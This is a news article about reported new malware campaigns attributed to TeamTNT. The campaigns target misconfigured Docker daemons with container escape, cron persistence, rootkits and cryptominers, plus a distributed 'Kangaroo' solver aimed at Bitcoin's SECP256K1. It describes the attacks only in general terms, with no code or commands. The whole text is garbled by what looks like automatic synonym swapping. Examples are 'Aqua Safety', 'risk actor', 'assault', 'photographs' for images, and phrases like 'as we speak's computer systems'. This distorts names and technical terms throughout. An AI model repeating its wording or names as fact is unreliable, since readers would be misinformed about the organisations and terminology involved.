TeamTNT Deploys Kangaroo Malware Assault On Bitcoin Focused At Breaking Encryption

Researchers at Aqua Safety have found cyberattacks that seem to have been performed by TeamTNT, a risk actor beforehand considered defunct. The researchers encountered three totally different assaults, every of which seems to be to be new. One in every of these assaults, which the researchers have dubbed the “Kangaroo assault,” is notable for leveraging distributed computing energy in an try to interrupt the encryption that underlies bitcoin.

TeamTNT was a risk actor extremely expert at compromising cloud environments. The risk actor’s assaults made use of never-seen-before methods and exploits, as TeamTNT developed its personal toolbox, reasonably than counting on the identical strategies utilized by many different risk actors. After working on this method for nearly two years, TeamTNT referred to as it quits in November 2021. The risk actor subsequently ceased to develop and deploy new malware. That mentioned, the risk actor didn’t take down its infrastructure, leaving its extant malware to proceed its unfold.

Now, nearly a 12 months after TeamTNT introduced its retirement, three new malware campaigns level to TeamTNT because the originator. Two of those assaults, the Kangaroo assault and the What Will Be assault, goal misconfigured Docker Daemons and set up Alpine Linux container photographs that obtain and run malicious shell scripts. The script run within the What Will Be assault exploits a vulnerability to flee the picture and compromise the host. Additional shell scripts then schedule cron jobs and set up rootkits and cryptominers. The third assault, dubbed Cronb, isn’t utterly new, however makes use of new C2 server addresses in comparison with earlier assaults. It’s used for lateral entry throughout a community, persistence, and to put in rootkits and cyptominers like What Will Be.

Nonetheless, whereas the 2 different assaults infect victims’ techniques to mine cryptocurrency, the Kangaroo assault does one thing of the alternative. It leverages contaminated environments to run a solver algorithm meant to interrupt the SECP256K1 encryption that underlies Bitcoin. Breaking this encryption with as we speak’s computer systems is taken into account to be a just about inconceivable activity, however the Kangaroo assault is tasking compromised environments with doing so anyway. The solver algorithm splits the job up into smaller duties, enabling TeamTNT to doubtlessly leverage lots of stolen laptop energy concurrently by distributing totally different chunks to every system compromised by the assault. Even so, breaking Bitcoin’s encryption on this approach continues to be extremely unlikely, making this explicit assault appear considerably unusual. It is not clear what the motive or intention is behind this explicit assault.